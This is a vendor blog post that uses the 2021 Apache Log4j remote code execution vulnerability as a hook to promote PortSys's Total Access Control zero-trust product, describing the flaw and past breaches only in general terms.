Apache Log4j: Same Wolf, Different Vulnerability

By Tim Boivin

Yesterday, CISA launched a webpage  and community-sourced repository of information and advisories regarding the Apache Log4j vulnerability that was discovered late last week. 

The vulnerability affects Apache Log4j software library versions 2.0-beta9 to 2.14.1, which are widely used in a variety of consumer and enterprise services, websites, and applications, as well as in operational technology products to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to take control of an affected system.

The widespread exploitation of this critical remote code execution (RCE) vulnerability has been in place at least since December 1st, according to news reports. Sadly, it may seem like this is yet another novel approach, but it really isn’t. This is just the same wolf, dressed up in a different vulnerability. 

Consider the more publicized attacks, such as Stuxnet,  SolarWinds Orion, GoldBrute, Hafnium Exchange, or Kaseya VSA. Or think about Equifax, JBS, Colonial Pipeline and Target – just to name a few of the dizzying array of well-known corporate victims over the past few years. 

These increasingly sophisticated attacks continue to achieve their objectives, often without even requiring input from end users, whom many organizations still rely on as their first line of defense. 

With so many different applications exposed in today’s perimeterless world, it’s impossible for your IT team to keep up. They have to be an expert on every IT security solution, stay current on the latest attacks, and generate updates and patches in a very timely manner for every possible wolf that comes knocking at your door. And they have to stay on top of all this every day, all day. 

It’s just not possible, even in the most well-funded IT organizations, to keep track. And that’s why these ravenous wolves keep getting in.

When will businesses learn? 

The question is, why? In this day and age, there simply isn’t any reason you should leave your door wide open for these wolves to waltz right into your IT infrastructure and eat up your applications – not if you have the proper authentication protocols in place. 

Our PortSys customers protect their infrastructure against these kinds of attacks with Total Access Control (TAC), a Zero Trust Access solution. TAC mitigates and stops cold the exploitation of the remote access vulnerabilities found in Apache, VPN, RDP, IoT – in fact, in any local, cloud, web services or supply chain solutions our customers rely on within their IT portfolio to conduct business. 

That’s because in today’s perimeterless world, TAC makes resources (like vulnerable Apache servers) invisible to the internet and protected by a combination of robust security policies, proper authentication and real-time, continuous evaluation of the context of access.

TAC’s evaluation of a user’s context of access incorporates multiple factors that go beyond username and password. TAC examines the device type, operating system, device security status, jailbreak or root status, whether antivirus is current, and more. TAC also leverages additional granular security policies to evaluate a user’s device, location, IP address, network connection and whether it is trusted or untrusted.

Hackers can’t attack what they can’t see

With TAC, your dozens of applications – and the vulnerabilities that may lie within them – aren’t visible to the internet. They are all hidden – and protected – behind TAC. That means hackers can’t use these exploited vulnerabilities to gain access to your infrastructure and then move laterally install malware, ransomware, and exfiltrate data (including user credentials). 

Yes, these attacks may seem like they are getting more sophisticated every day. That’s because they are. But no, despite the media hype, this isn’t anything new. These attacks will continue to evolve, continue to get more sophisticated, continue to lock down businesses as they scramble to recover.

It doesn’t have to be that way. TAC’s Zero Trust Access approach means you can stop opening the door for these wolves. And TAC can be up and running in your infrastructure in days or weeks – not the months or years it frequently takes to implement other IT security solutions that aren’t as comprehensive in their approach. 

With TAC, you don’t have to be afraid of the big, bad wolves anymore.

Eliminate your attack surface in today’s perimeterless world with Total Access Control by PortSys.

Contact us at info@portsys.com or 781-996-4900 to quickly slam the doors shut on these wolves.